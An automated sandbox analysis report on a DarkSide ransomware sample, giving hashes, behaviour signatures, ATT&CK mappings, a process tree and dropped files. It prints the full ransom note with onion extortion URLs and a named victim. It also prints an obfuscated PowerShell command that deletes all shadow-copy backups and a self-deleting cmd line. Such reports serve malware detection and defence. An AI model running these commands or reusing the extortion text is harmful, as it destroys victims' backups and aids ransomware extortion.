Resubmissions

27-01-2024 19:37

240127-yb5pksafd3 10

27-01-2024 19:36

240127-ybqwesafc2 10

12-05-2021 15:56

210512-db4t7vmwas 10

Analysis

  • max time kernel
    91s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-01-2024 19:37

General

  • Target

    06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe

  • Size

    59KB

  • MD5

    91e2807955c5004f13006ff795cb803c

  • SHA1

    a3e7561de73378b453186a6c33858bf47577d69c

  • SHA256

    06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8

  • SHA512

    5d98bc32af83462938633c0d2b692d5b69c9c6151459aefc1276d41947e2514c444ed417c19b39b9c5b8d5359dee5fa2d3f7c8c30ae9f2a687cd02ec3a7b6311

  • SSDEEP

    768:vjjmbIax7F3DS4/S9+CuUSbVAdNcxGV1yln/pY23W58:0x7Fu4/ihrhDTV1yl/SZ58

Malware Config

Extracted

Path

C:\Users\README.95b288ea.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data Leak ---------------------------------------------- Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. Blog URL ---------------------------------------------- http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 When you open our website, put the following data in the input form: Key: MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu

http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Renames multiple (174) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe
    "C:\Users\Admin\AppData\Local\Temp\06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe"
    1⤵
    • Checks computer location settings
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1920
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2952
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\06CFE7~1.EXE >> NUL
      2⤵
        PID:5560
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3312

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Unsecured Credentials

    1
    T1552

    Credentials In Files

    1
    T1552.001

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Collection

    Data from Local System

    1
    T1005

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      556084f2c6d459c116a69d6fedcc4105

      SHA1

      633e89b9a1e77942d822d14de6708430a3944dbc

      SHA256

      88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

      SHA512

      0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      806286a9ea8981d782ba5872780e6a4c

      SHA1

      99fe6f0c1098145a7b60fda68af7e10880f145da

      SHA256

      cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713

      SHA512

      362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wxd4zj1v.d2x.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\README.95b288ea.TXT
      Filesize

      2KB

      MD5

      7fad25f046dfb904a3a0ce766d7da931

      SHA1

      2ff8afdb6c4cdedac1683a9a6bb2f9f0a4b73717

      SHA256

      6db701f3454ea0dd8b003a69c69c442eb1817aacb08f6421c01180604b11029b

      SHA512

      65a343a094f6a96372ca08da5d39fd8b44a92e70332c81600420fde46132834117f767fc8a5712a713588681e4c44bfb454beb8a73d9ede306363087339a7813

    • memory/2952-5-0x0000020356A10000-0x0000020356A32000-memory.dmp
      Filesize

      136KB

    • memory/2952-15-0x000002033C250000-0x000002033C260000-memory.dmp
      Filesize

      64KB

    • memory/2952-16-0x000002033C250000-0x000002033C260000-memory.dmp
      Filesize

      64KB

    • memory/2952-14-0x000002033C250000-0x000002033C260000-memory.dmp
      Filesize

      64KB

    • memory/2952-13-0x00007FFBC8E20000-0x00007FFBC98E1000-memory.dmp
      Filesize

      10.8MB

    • memory/2952-19-0x00007FFBC8E20000-0x00007FFBC98E1000-memory.dmp
      Filesize

      10.8MB